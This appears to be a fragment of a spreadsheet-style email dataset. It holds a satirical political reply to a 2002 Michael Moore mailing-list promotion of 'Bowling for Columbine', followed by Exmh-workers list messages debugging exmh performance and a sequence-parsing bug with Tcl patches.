&gt; This would also allow for a convenient and very public method by which 
&gt; candidates could raise capital in the public markets to support their 
&gt; multi-billion-dollar campaigns.  The requirement for the support of 
&gt; legions of spin doctors, permanent campaign managers, and investor 
&gt; relations personnel would also create jobs -- perhaps even a new 
&gt; practice for Ernst &amp; Young, Arthur Anderson, et al.  Insider trading 
&gt; scandals and misleading revenue declarations would of course catch 
&gt; Martha Stewart as an unwitting beneficiary, thus spreading her 
&gt; influence to politics.
&gt;
&gt; Dividends, if there are any on record, at the close of a politician's 
&gt; career could be paid to current shareholders based on the holdings.  
&gt; Pensions funds could provide the institutional investment support 
&gt; necessary to underpin even the biggest dogs among the Beltway set.  
&gt; Union funds, brokerages, and even pump-and-dump houses could benefit 
&gt; from meteoric rises in conservative candidates running in the 
&gt; Southeast, and the Bush Governmet would be allowed to place Social 
&gt; Security bets where they really mattered.   investors who lose their 
&gt; retirement, life savings, and support could rest assured that they 
&gt; were indeed robbed by crooks rather than poor investors.
&gt;
&gt; Although there's no way to protect any of these for Worldcom-like 
&gt; crashes, ambitious, inspired, District Attorneys could file criminal 
&gt; suits against Candidates and Campaign Managers who underperform 
&gt; expectations, thus assuring investors that their logic was not faulty 
&gt; -- instead, they were merely defrauded by crooks and thieves.
&gt;
&gt; On the whole, I believe the system could work.  I could certainly work 
&gt; as well as our beloved securities trading industry and, given the 
&gt; American electoral system's success at effectively expressing the will 
&gt; of the people, it certainly couldn't do any worse...
&gt;
&gt; In the meantime, Mike, I think I'll go see your movie and try to 
&gt; depose the President.
&gt;
&gt; -Ian.
&gt;
&gt;
&gt;
&gt; On Wednesday, October 9, 2002, at 03:53 PM, Michael Moore's Mailing 
&gt; List wrote:
&gt;
&gt;&gt; October 9, 2002
&gt;&gt;
&gt;&gt; My Film, "Bowling for Columbine," Opens This Friday
&gt;&gt;
&gt;&gt; Dear friends, fans, and fellow evildoers:
&gt;&gt;
&gt;&gt; I am very happy and excited to tell you that this Friday, October 11, 
&gt;&gt; my
&gt;&gt; new
&gt;&gt; film, "Bowling for Columbine," will open in New York and Los Angeles.
&gt;&gt;
&gt;&gt; It is, I promise, the last thing the Bushies want projected on the 
&gt;&gt; movie
&gt;&gt; screens across America this week. The film is, first and foremost, a
&gt;&gt; devastating indictment of the violence that is done in our name for 
&gt;&gt; profit
&gt;&gt; and power -- and no one, in all the advance screenings I have 
&gt;&gt; attended, has
&gt;&gt; left the theatre with anything short of rage. I truly believe this 
&gt;&gt; film has
&gt;&gt; the potential to rock the nation and get people energized to do 
&gt;&gt; something.
&gt;&gt;
&gt;&gt; This is not good news for Junior and Company. Not when they are 
&gt;&gt; trying to
&gt;&gt; drag us into another war. Not when a crazed sniper is exercising his
&gt;&gt; constitutional right to own a high-powered rifle. Not when John 
&gt;&gt; Ashcroft is
&gt;&gt; still prohibiting the FBI from looking through the gun background 
&gt;&gt; check
&gt;&gt; files to see if any of the 19 hijackers or their associates purchased 
&gt;&gt; any
&gt;&gt; weapons prior to 9/11 -- because THAT, we are told, would "violate" 
&gt;&gt; these
&gt;&gt; terrorists' sacred Second Amendment rights!
&gt;&gt;
&gt;&gt; Yes, I believe this movie can create a lot of havoc -- but I will 
&gt;&gt; need ALL
&gt;&gt; of you to help me do this. Are you game?
&gt;&gt;
&gt;&gt; Last February 5th, I wrote to tell you about a book I had written and 
&gt;&gt; how
&gt;&gt; the publisher had decided to dump it because they were afraid to 
&gt;&gt; publish
&gt;&gt; anything critical of Bush after 9/11. I appealed to you to save 
&gt;&gt; "Stupid
&gt;&gt; White Men" from the shredder and to go out and buy it. I promised you 
&gt;&gt; would
&gt;&gt; not regret it, and that the book would not only be a great read but an
&gt;&gt; important organizing tool in gumming up the plans of George W. Bush.
&gt;&gt;
&gt;&gt; Within 24 hours, the book went to #1 on the Amazon best seller list. 
&gt;&gt; By the
&gt;&gt; fifth day, the book was already into its 9th printing. The publisher 
&gt;&gt; was
&gt;&gt; torn between its desire to kill the book or make a wad of money. 
&gt;&gt; Greed won
&gt;&gt; out, and this Sunday the book enters its 31st week on the New York 
&gt;&gt; Times
&gt;&gt; best seller list -- and its 32nd printing. This is all because of 
&gt;&gt; you, my
&gt;&gt; crazy and loyal friends. You made this happen, against all the odds.
&gt;&gt;
&gt;&gt; Now I would like to ask you again to help me with my latest work, 
&gt;&gt; "Bowling
&gt;&gt; for Columbine." It's a movie that many critics have already called my 
&gt;&gt; best
&gt;&gt; film to date. They may be right. It is certainly the most provocative 
&gt;&gt; thing
&gt;&gt; I have ever done. I have spent three years on it and, I have to say, 
&gt;&gt; it
&gt;&gt; cuts
&gt;&gt; deeper, harder and funnier that anything I have given you so far.
&gt;&gt;
&gt;&gt; The movie opens this Friday in New York and Los Angeles, and then in 
&gt;&gt; 8 more
&gt;&gt; cities next week. How it does in these first ten cities will determine
&gt;&gt; whether or not the rest of the country gets to see it. That is the 
&gt;&gt; nutty
&gt;&gt; way
&gt;&gt; our films are released. If it doesn't have a big opening weekend, you 
&gt;&gt; can
&gt;&gt; kiss the film good-bye. Therefore, this weekend, this film must be 
&gt;&gt; seen by
&gt;&gt; millions of Americans. Can you help me make that happen?
&gt;&gt;
&gt;&gt; "Bowling for Columbine" is not a film simply about guns or school
&gt;&gt; shootings.
&gt;&gt; That is only the starting point for my 2-hour journey into the dark 
&gt;&gt; soul of
&gt;&gt; a country that is both victim and master of an enormous amount of 
&gt;&gt; violence,
&gt;&gt; both at home and around the world. With this movie I have broadened my
&gt;&gt; canvas to paint a portrait of our nation at the beginning of the 21st
&gt;&gt; century, a nation that seems hell-bent on killing first and asking
&gt;&gt; questions
&gt;&gt; later. It is a movie about the state sponsored acts of violence and
&gt;&gt; terrorism against our own poor, and how we have created a culture of 
&gt;&gt; fear
&gt;&gt; that is based on the racial dilemma we continue to ignore. And it's a
&gt;&gt; devastating comedy.
&gt;&gt;
&gt;&gt; This film is going to upset some pretty big apple carts. No film has 
&gt;&gt; EVER
&gt;&gt; said the things I am saying in "Bowling for Columbine." I expect to be
&gt;&gt; attacked. I expect certain theatres will not show it for fear of
&gt;&gt; retribution. I expect that this movie will be a bitter pill for many 
&gt;&gt; to
&gt;&gt; swallow.
&gt;&gt;
&gt;&gt; This is why I need your help. Movies live or die based on what 
&gt;&gt; happens at
&gt;&gt; the box office the first weekend of its release. I need you, if you 
&gt;&gt; live in
&gt;&gt; the New York or L.A. area, to go see "Bowling for Columbine" this 
&gt;&gt; Friday
&gt;&gt; and
&gt;&gt; Saturday -- and take as many family members and friends with you as
&gt;&gt; possible. I guarantee you will not be disappointed -- and you may 
&gt;&gt; just see
&gt;&gt; one of the best films of the year.
&gt;&gt;
&gt;&gt; Monday night in Times Square, "Bowling for Columbine" had its 
&gt;&gt; premiere. The
&gt;&gt; crowd was amazing, as it was this past Saturday night at the Chicago 
&gt;&gt; Film
&gt;&gt; Festival. The audience kept laughing or hooting or applauding so loud
&gt;&gt; throughout the film that it was hard to hear the next line.
&gt;&gt;
&gt;&gt; The hate mail, the threats, the promises of retribution have already
&gt;&gt; started
&gt;&gt; to roll in to the distributor of this movie, United Artists. They are 
&gt;&gt; not
&gt;&gt; backing down. But how long will this last? I need all of you in the 
&gt;&gt; New
&gt;&gt; York
&gt;&gt; tri-state and southern California areas to go see "Bowling for 
&gt;&gt; Columbine"
&gt;&gt; THIS weekend -- the rest of you can see it in a couple of weeks when 
&gt;&gt; it
&gt;&gt; comes to your town. A strong opening not only means that the rest of
&gt;&gt; America
&gt;&gt; will see this film, it means that a good number of people who see it 
&gt;&gt; are
&gt;&gt; going to leave the film angry enough to get active and get involved. 
&gt;&gt; If it
&gt;&gt; does poorly, I will have a difficult time finding the funding for the 
&gt;&gt; movie
&gt;&gt; I want to make next -- a film about 9/11 and how Bush is using that 
&gt;&gt; tragic
&gt;&gt; day as a cover for his right-wing agenda.
&gt;&gt;
&gt;&gt; Don't let that happen. Don't let the NRA have one more success by 
&gt;&gt; stopping
&gt;&gt; the wider distribution of this movie. And, together, let us not remain
&gt;&gt; silent in our opposition to Bush's phony war against Iraq.
&gt;&gt;
&gt;&gt; If you live in New York, you can see it at the Lincoln Plaza, the 
&gt;&gt; Sunshine
&gt;&gt; and the Loews 19th St. In L.A., you can catch it at the Sunset 5, the
&gt;&gt; Westwood Regent, Laemmle Sunset, Laemmle Towncenter (Encino), Landmark
&gt;&gt; Rialto (Pasadena), and Regal University (Irvine). Also, please 
&gt;&gt; forward this
&gt;&gt; to your other friends and tell them to go see "Bowling for Columbine" 
&gt;&gt; this
&gt;&gt; weekend.
&gt;&gt;
&gt;&gt; And finally, don't miss our new website www.bowlingforcolumbine.com
&gt;&gt;
&gt;&gt; Thank you for your help with this. I feel so honored and privileged 
&gt;&gt; to have
&gt;&gt; so many people interested in my work. Last January I was getting 
&gt;&gt; 70,000
&gt;&gt; hits
&gt;&gt; a month on my website. Last month, I got 17 million hits. This alone 
&gt;&gt; speaks
&gt;&gt; volumes about the vast majority all of us belong to who are sick and 
&gt;&gt; tired
&gt;&gt; of what is going on and are longing for an alternative source of
&gt;&gt; information.
&gt;&gt;
&gt;&gt; I hope that you enjoy "Bowling for Columbine."
&gt;&gt;
&gt;&gt; Thank you again...
&gt;&gt;
&gt;&gt; Yours,
&gt;&gt;
&gt;&gt; Michael Moore
&gt;&gt;
&gt;&gt; ---
&gt;&gt;
&gt;&gt; If you wish to be be unsubscribed from this mailing list, please 
&gt;&gt; click the
&gt;&gt; link below and follow the instructions.
&gt;&gt;
&gt;&gt; http://www.michaelmoore.com/mailing/unsubscribe.php
&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
lately I've got the feeling that exmh is getting slower and slower. I 
just decided to check that vs. reality, and yes, speed has left the 
scene somewhere between the release of 2.5 and now.I checked on a number of small messages in a big folder (~10000 
msgs). The delay of the Next button has increased considerably:2.5-release: 350-450 msec
latest cvs: 1000-12000 msecFrankly I think this is getting close to non-acceptable since the 
user settings hasn't changed.Anybody have any ideas where performance disappeared?/Anders_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>cwg-dated-1030817858.a49b7e@DeepEddy.Com said:
&gt; From:  Anders Eriksson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&gt; Most likely in the added overhead of managing more sequences.
&gt; I'm sure it can be tuned a bunch, but as I'm leaving for a vacation on
&gt; Friday,  and have plenty of "real work" to do, I won't be able to do
&gt; much until I get  back.&gt; I *will* look at all this when I get back, but if you want to check
&gt; into  what's slow and fix things while I'm gone, my feelings won't be
&gt; hurt.&gt; Chris Just one more info. I measured the time spent wrapping the stuff in 
Ftoc_Next with time {} so the data is for real. One difference 
between mine and Valdis' setup (judging from his trace) is that I use 
the address book. I've been doing that for ages so that can't be the 
problem.Is there a way to get the log to print time with higher granularity?/A
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
Valdis.Kletnieks@vt.edu said:
&gt; I checked on a number of small messages in a big folder (~10000 
&gt; msgs). The delay of the Next button has increased considerably:
&gt; 
&gt; 2.5-release: 350-450 msec
&gt; latest cvs: 1000-12000 msec
&gt; I'm not seeing a hit on 'next'. A quick "just pound on 'next' and
&gt; watch the wall clock" test shows me able to go through 20 messages in
&gt; under 5 seconds, so it's well under 250ms per switch, but I'm seeing a
&gt; really piggy CPU spike (100% for a few seconds) in the 'flist' code.
&gt; Of course, it seems to be related to number-of-folders:&gt; [~] wc Mail/.folders
&gt;     131     131    1122 Mail/.folders I have 167 folders (!) and run with bg-proc set to flist (1 minute). 
I see delays, but not that much. Maybe 1-3 seconds (which tend to 
disappear these days). This is on a PII-266.BR,
/A_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;Chris Garrigues said: &gt; Done.  I also eliminated the msgs variable on the theory that simpler is
 &gt; 
 &gt; better (I spent a lot of time hacking out the underbrush in exmh while 
 &gt; working on the sequences window).Just a big *thank you* to Chris for being willing to dive in and get
very messy.  The sequence management code is some of the very oldest
in exmh, and surely suffered as features were added over several years.
When this stabilizes, it will be a great excuse for a 2.6 release.--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</si>
  <si>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 xml:space="preserve">    Date:        Mon, 26 Aug 2002 09:27:56 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;  | Tell me what keystroke made it happen so I can reproduce it and I'll
  | see what I can do about it (or if I can't, I'll hand it off to Brent).Don't worry too much about it, you seem to have plenty of other things
to do in the immediate future, and this one isn't so critical that people
can't use the code in normal ways.But, to make it happen, type (with normal key bindings) any digit, so the
code thinks you're trying a message number, then backspace, so the digit
goes away, then '-' (other junk characters don't seem to have the
problem, I have just been playing).   That will do it (every time).That is: 0 ^h -Once you get into that state, the same traceback occurs for every
character you type, until a message is selected with the mouse.This is looking like it might be easy to find and fix, so I'll take a
look at it later.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>You can also duplicate thiswithMsgChange - noshowat the Tcl prompt in the Log window.  I suspect that the sequence
parser, which understands things like 5-22 to mean messages 5 through 22
is confused when asked to add/remove message "-" from a sequence.If we are allowed to assume 8.2 or higher, which we can't really, then
we could addif {![string is integer $select(sel)]} {
   # bail out of message select mode
}
to the SelectTypein procedure.We can probably survive withif {![regexp {^[0-9]+$} $select(sel)]} {
    #bail out of message select mode
}&gt;&gt;&gt;Robert Elz said:
 &gt;     Date:        Mon, 26 Aug 2002 09:27:56 -0500
 &gt;     From:        Chris Garrigues 
 &gt;     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;
 &gt; 
 &gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll
 &gt;   | see what I can do about it (or if I can't, I'll hand it off to 
Brent).
 &gt; 
 &gt; Don't worry too much about it, you seem to have plenty of other things
 &gt; to do in the immediate future, and this one isn't so critical that people
 &gt; can't use the code in normal ways.
 &gt; 
 &gt; But, to make it happen, type (with normal key bindings) any digit, so the
 &gt; code thinks you're trying a message number, then backspace, so the digit
 &gt; goes away, then '-' (other junk characters don't seem to have the
 &gt; problem, I have just been playing).   That will do it (every time).
 &gt; 
 &gt; That is: 0 ^h -
 &gt; 
 &gt; Once you get into that state, the same traceback occurs for every
 &gt; character you type, until a message is selected with the mouse.
 &gt; 
 &gt; This is looking like it might be easy to find and fix, so I'll take a
 &gt; look at it later.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</si>
  <si>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 xml:space="preserve">
I may be wrong but I think a single select entry field is used
for selecting messages and switching folders. Restricting the entries
to be numeric would break the folder switching functionality, wouldn't
it?My version of MsgChange, not yet updated, has a check    if {$msgid != {}} {
	# Allow null msgid from Msg_ShowWhat, which supplies line instead
	if {$msgid &lt; 0}  return
    } else {
    ...at the start of the procedure which takes care of the single '-' case.
Perhaps the thing to do is for MsgChange to validate a msgid as a
number before continuing.KevinIn message &lt;200208280108.VAA30178@blackcomb.panasas.com&gt;, Brent Welch writes:
&gt; You can also duplicate thiswith
&gt; 
&gt; MsgChange - noshow
&gt; 
&gt; at the Tcl prompt in the Log window.  I suspect that the sequence
&gt; parser, which understands things like 5-22 to mean messages 5 through 22
&gt; is confused when asked to add/remove message "-" from a sequence.
&gt; 
&gt; If we are allowed to assume 8.2 or higher, which we can't really, then
&gt; we could add
&gt; 
&gt; if {![string is integer $select(sel)]} {
&gt;    # bail out of message select mode
&gt; }
&gt; to the SelectTypein procedure.
&gt; 
&gt; We can probably survive with
&gt; 
&gt; if {![regexp {^[0-9]+$} $select(sel)]} {
&gt;     #bail out of message select mode
&gt; }
&gt; 
&gt; &gt;&gt;&gt;Robert Elz said:
&gt;  &gt;     Date:        Mon, 26 Aug 2002 09:27:56 -0500
&gt;  &gt;     From:        Chris Garrigues  m&gt;
&gt;  &gt;     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;
&gt;  &gt; 
&gt;  &gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll
&gt;  &gt;   | see what I can do about it (or if I can't, I'll hand it off to 
&gt; Brent).
&gt;  &gt; 
&gt;  &gt; Don't worry too much about it, you seem to have plenty of other things
&gt;  &gt; to do in the immediate future, and this one isn't so critical that people
&gt;  &gt; can't use the code in normal ways.
&gt;  &gt; 
&gt;  &gt; But, to make it happen, type (with normal key bindings) any digit, so the
&gt;  &gt; code thinks you're trying a message number, then backspace, so the digit
&gt;  &gt; goes away, then '-' (other junk characters don't seem to have the
&gt;  &gt; problem, I have just been playing).   That will do it (every time).
&gt;  &gt; 
&gt;  &gt; That is: 0 ^h -
&gt;  &gt; 
&gt;  &gt; Once you get into that state, the same traceback occurs for every
&gt;  &gt; character you type, until a message is selected with the mouse.
&gt;  &gt; 
&gt;  &gt; This is looking like it might be easy to find and fix, so I'll take a
&gt;  &gt; look at it later.
&gt; 
&gt; 
&gt; --
&gt; Brent Welch
&gt; Software Architect, Panasas Inc
&gt; Pioneering the World's Most Scalable and Agile Storage Network
&gt; www.panasas.com
&gt; welch@panasas.com
&gt; 
&gt; 
&gt; 
&gt; 
&gt; _______________________________________________
&gt; Exmh-workers mailing list
&gt; Exmh-workers@redhat.com
&gt; https://listman.redhat.com/mailman/listinfo/exmh-workers_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Tue, 27 Aug 2002 18:08:12 -0700
    From:        Brent Welch 
    Message-ID:  &lt;200208280108.VAA30178@blackcomb.panasas.com&gt;  | If we are allowed to assume 8.2 or higher, which we can't really, then
  | we could add
[...]
  | to the SelectTypein procedure.Yes, I looked at "fixing" it there, but that code is really quite
general, with almost no understanding of what anything means, so I
didn't think that corrupting it with knowlwedge of the semantics of
what it is fetching would really be the best thing to do.I ran out of time last night while looking for a better place for
a similar check (I would have gone directly to the regexp - I'm not
that up to date with all the latest tcl changes...) and I'm not sure
I will have time today, but I will keep looking.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>I have some patches that seem to fix/avoid this problem now.   (It is
amazing what one can achieve when mains power fails, long enough for
UPS's to run out, and all that is left operational is the laptop and
its battery supply...)First, I put in some defensive code into the area where the problem was
occurring, so that if exmh is attempting (for any reason) to expand a
sequence that isn't either a number, or a range of numbers (or a list of
such things) it will simply ignore the trash, rather than giving a traceback.
This one solves the initial problem:--- mh.tcl.WAS	Thu Aug 22 21:15:06 2002
+++ mh.tcl	Wed Aug 28 12:39:11 2002
@@ -487,6 +487,10 @@
     set seq {}
     set rseq {}
     foreach range [split [string trim $sequence]] {
+	if ![regexp {^[0-9]+(-[0-9]+)?$} $range] {
+	    # just ignore anything bogus
+	    continue;
+	}
 	set parts [split [string trim $range] -]
 	if {[llength $parts] == 1} {
 	    lappend seq $parts
That is amending proc MhSeqExpand which is where the error was occurring
before (the code assumes that $range is either NNN or NNN-MMM so we should
probably make sure that's true - issue an error instead of just "continue"
if you like, but I don't think an error is needed).But that just allowed me to create a similar problem, in another place,
by typing "NNN-" ... and rather than continue to fight fires like this,
I thought I should think more about Brent's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typed.This way, any later expansion to what MsgShow treats as legal (maybe
allowing a sequence name, like "prev" or "next", or anything else can
be handled just there, without someone needing to remember that they have
to go fix the selection processing code to allow it.But, while I was playing there, I noticed something I never new before.
If you type "66+" the "66" changes to "67" (and so on, for each + that
is typed).   I suspect that's perhaps an artifact of "+ is bound to a
different function so it can be used as a toggle between changing the
current and the target folder, but it has to mean something if the current
input mode is a message number, so let it mean...", but now I found it,
I think its nice.    But if we can type 66+ why not 66- as well?  That
kind of limitation bugs me, so I fixed it.And then I wondered about folders with names containing '+' - the special
use of + as the toggle character means there's no way to type those from
the keyboard.   So I fixed that as well.   This makes two different
restrictions - there's no way to type a folder name that has a name
beginning with '+' (but such a thing in MH would be a pain to use anyway,
so I doubt this will bother anyone), and it is now only possible to
toggle between typing the current &amp; target folder name when the name
being typed is empty.   I'm less happy about that part, but I think I
can live with it in order to allow folder names with +'s in them to
exist and be typed.Then, since I was there anyway, I decided to do something about another
feature that has always bugged me.   In "normal" keyboard mode, 's' is
the key used to show a message.    But if you've just typed 123, and
the FTOC is highlighting 123 as the current message, and you want to now
show that message, you can't type 's', you have to type \r instead.
So I "fixed" this one as well.   "Fixed" here is in quotes, as it assumes
that the keybinding for MsgShow is 's', if you change that to something
else, it will remain 's' in here.   I don't know enough tk/tcl to have it
discover what key is bound to a function in the external world in order
to bind the same one here.   \r continues to work of course.And now I got started in fixing irritants in this code, I also made it
clear the status line if you abort message/folder entry mode (^C or ^G).
Previously it used to leave the prompt sitting there until the next
message appeared, which made it less than obvious that the keyboard had
reverted to its usual bindings.In any case, what follows is the patch that does all of that.   I believe
that if you apply this, then the one above is probably not needed, the
"catch" around the "MsgShow" will hide the problem (I don't think we really
need to fix Brent's way of invoking it).   Or include it anyway, just
for completeness (I haven't run an exmh with the following patch, but not
the previous one, so I don't know for sure that all will be OK then).kre--- select.tcl.WAS	Thu Aug 22 21:15:07 2002
+++ select.tcl	Wed Aug 28 13:36:17 2002
@@ -49,9 +49,11 @@
     bindtags $w [list $w Entry]
     bind $w 	{SelectTypein %W %A}
     bind $w 	{SelectToggle %W }
+    bind $w 	{SelectPrev %W }
     bind $w 	{SelectComplete %W}
     bind $w 	{SelectComplete %W}
     bind $w 	{SelectReturn %W}
+    bind $w 	{SelectReturn %W %A}
     bind $w 	{SelectBackSpace %W}
     bind $w 	{SelectBackSpace %W}
     bind $w 	{SelectBackSpace %W}
@@ -72,7 +74,7 @@
     append select(sel) $a
     Exmh_Status "$select(prompt) $select(sel)"
     if ![info exists select(folder)] {
-	Msg_Change $select(sel) noshow
+	catch { Msg_Change $select(sel) noshow }
     }
 }
 proc SelectBackSpace { w } {
@@ -91,6 +93,10 @@
 proc SelectToggle {w} {
     global select
     if [info exists select(folder)] {
+	if {$select(sel) != ""} {
+	    SelectTypein $w +
+	    return
+	}
 	set select(toggle) [list [lindex $select(toggle) 1] [lindex $select(toggle) 0]]
 	set select(prompt) "[lindex $select(toggle) 0] Folder:"
     } else {
@@ -101,6 +107,18 @@
     }
     Exmh_Status "$select(prompt) $select(sel)"
 }
+proc SelectPrev {w} {
+    global select
+    if [info exists select(folder)] {
+	SelectTypein $w "-"
+    } else {
+	catch {
+	    incr select(sel) -1
+	    Msg_Change $select(sel) noshow
+	}
+        Exmh_Status "$select(prompt) $select(sel)"
+    }
+}
 proc SelectComplete { w } {
     global select
     if [info exists select(folder)] {
@@ -126,9 +144,13 @@
 	Exmh_Status "$select(prompt) $select(sel)"
     }
 }
-proc SelectReturn { w } {
+proc SelectReturn { w {a {}} } {
     global select
     if [info exists select(folder)] {
+	if {$a != {}} {
+	    SelectTypein $w $a
+	    return
+	}
 	if [info exists select(match)] {
 	    set select(sel) $select(match)
 	    unset select(match)
@@ -151,6 +173,7 @@
 	unset select(folder)
     }
     $select(entry) configure -state disabled
+    Exmh_Status ""
     Exmh_Focus
 }
 proc SelectClear { w } {
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 28 Aug 2002 13:51:21 +0700
    From:        Robert Elz 
    Message-ID:  &lt;18366.1030517481@munnari.OZ.AU&gt;
  | But, while I was playing there, I noticed something I never new before.I also no the difference between new &amp; knew, but I don't always type well...
Um, I mean, I know the difference...kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Thu, 22 Aug 2002 10:04:06 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1030028647.6462.TMDA@deepeddy.vircio.com&gt;  | hmmm, I assume you're going to report this to the nmh folks?It turns out, when I did some investigation, that my memory of how MH
worked here was wrong (that's not unusual) - the -seq switch seems to
have always done -nolist (requiring a subsequent -list to turn it on
again).Given that, I have no idea how the pick code as it was ever worked.  In
fact, it quite possibly never did the way it was intended to (I have just
been browsing the 2.5 sources, and that seems to be attempting to do things
that I never saw happen).It may be that your new sequence method just exposed the bug that had been
there all along.Given this, I won't be sending any bug reports to the nmh people.  If nmh
ever seems to be showing any signs further progress, and if I remember this
then, I might send them a change request.   The code to make the change is
trivial.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 28 Aug 2002 09:22:34 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt;
  | so I'll probably poke around at the sequences performance issues,Well, there's this wonderful piece of code in MhSeqExpand ...    # Hack to weed out sequence numbers for messages that don't exist
    foreach m $rseq {
        if ![file exists $mhProfile(path)/$folder/$m] {
            Exmh_Debug $mhProfile(path)/$folder/$m not found
            set ix [lsearch $seq $m]
            set seq [lreplace $seq $ix $ix]
        } else {
            # Real hack
            break
        }
    }which is going to run slow if a sequence happens to start with a bunch
of messages that don't exist.   I'm not sure why it is important that the
first message in the sequence returned exists, but not necessarily any
of the others, but I'm sure glad it is, as MhSeqExpand gets called lots,
and I don't know if I could cope if it were checking every file in the
sequences it is looking at, all the time...It may help to keep a list of the valid message numbers for the current
folder (though that would then need to be verified against changes to the
directory).   Does tcl have a directory read function?   I assume so...Mh_Sequence also goes and rereads the files (.mh_sequences and the
context file) but I'm not sure how frequently that one is called.  | I'll email anything I figure out since I'm leaving town in less 
  | than 48 hours.Have a good vacation.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;Robert Elz said:
 &gt;     Date:        Wed, 28 Aug 2002 09:22:34 -0500
 &gt;     From:        Chris Garrigues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hackAt least I'm up-front about my hacks :-)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time...That was my thinking.  My recollection about the first message being valid
is that the ftoc code wants to find that message to start its highlighting,
for example, or you are selecting a message to display. &gt; It may help to keep a list of the valid message numbers for the current
 &gt; folder (though that would then need to be verified against changes to the
 &gt; directory).   Does tcl have a directory read function?   I assume so...glob -nocomplain $mhProfile(path)/$folder *
will return an unsorted list of the directory's contents.
But the thought of keeping an in memory list of valid messages is not fun.
Exmh already maintains in-core lists of messages in sequences, which is
already pretty tricky &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the
 &gt; context file) but I'm not sure how frequently that one is called.In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</si>
  <si>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Well, I've used the check-the-modify-time cache trick for files in
many places (not just exmh) so some part of me certainly thinks it
is effective.  However, it occurred to me that if we do checkpoint
state, then aren't we modifying the sequences file for the current
folder on every message read?  Perhaps we look at the sequences file
more than once per message view?  Just idle speculation - we can
stick in some time calls to find out how expensive things are.Someone asked about increasing the time resolution in the exmh log.
We could make that conditional on some support available in 8.3 -
Tcl has had "clock seconds" (like gettimeofday) and "clock clicks"
(high resolution timer) for some time.  But in 8.3 we've calibrated
clock clicks values to microseconds.  It is still only useful for
relative times, but each call to Exmh_Log could emit the microsecond
delta since the last log record.  Of course, we are measuring all
the overhead of taking the log record, etc.  I'll try it out.&gt;&gt;&gt;Chris Garrigues said:
 &gt; &gt; From:  Brent Welch 
 &gt; &gt; Date:  Wed, 28 Aug 2002 10:32:42 -0700
 &gt; &gt;
 &gt; &gt; 
 &gt; &gt; &gt;&gt;&gt;Robert Elz said:
 &gt; &gt;  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the
 &gt; &gt;  &gt; context file) but I'm not sure how frequently that one is called.
 &gt; &gt; 
 &gt; &gt; In some places I maintain caches of files by checking their modify
 &gt; time,
 &gt; &gt; but the sequence files are soo small that by the time you stat them to
 &gt; &gt; check their date stamp, you could just read them again.
 &gt; 
 &gt; Do you really think this is true?  I added a modify time check thinking
 &gt; that 
 &gt; it would make an improvement since we were reading it a *lot* more times
 &gt; in 
 &gt; the new code because we're trying to use the sequences.
 &gt; 
 &gt; On the other hand, the sequences files are probably being read out of
 &gt; cache 
 &gt; when that happens anyway.
 &gt; 
 &gt; Even with a small file, I'd think that the time taken to do a 
 &gt; [file mtime $filename] would be worth it.  My code is in proc
 &gt; MhReadSeqs.
 &gt; 
 &gt; Chris
 &gt; 
 &gt; -- 
 &gt; Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 &gt; virCIO                          http://www.virCIO.Com
 &gt; 716 Congress, Suite 200
 &gt; Austin, TX  78701		+1 512 374 0500
 &gt; 
 &gt;   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 &gt; 
 &gt; --
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;Chris Garrigues said:
 &gt; &gt; From:  Brent Welch 
 &gt; &gt; Date:  Wed, 28 Aug 2002 22:40:21 -0700
 &gt; &gt;
 &gt; &gt; Well, I've used the check-the-modify-time cache trick for files in
 &gt; &gt; many places (not just exmh) so some part of me certainly thinks it
 &gt; &gt; is effective.  However, it occurred to me that if we do checkpoint
 &gt; &gt; state, then aren't we modifying the sequences file for the current
 &gt; &gt; folder on every message read?  Perhaps we look at the sequences file
 &gt; &gt; more than once per message view?  
 &gt; 
 &gt; As I'd written the code a few months ago, we were reading the sequences
